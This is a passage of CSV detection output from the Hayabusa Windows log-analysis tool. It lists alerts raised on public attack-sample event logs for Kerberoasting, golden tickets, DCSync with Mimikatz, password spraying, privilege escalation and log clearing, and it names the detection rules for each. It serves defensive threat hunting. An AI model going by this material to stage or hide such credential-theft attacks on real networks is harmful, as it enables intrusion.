OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx -2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain 
Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! 
(Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx -2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx -2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx -2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.434 
+09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD 
User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes 
accessed.evtx -2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service 
Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:54.999 
+09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 
62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 
0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: 
gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket 
issued.evtx -2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx -2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami 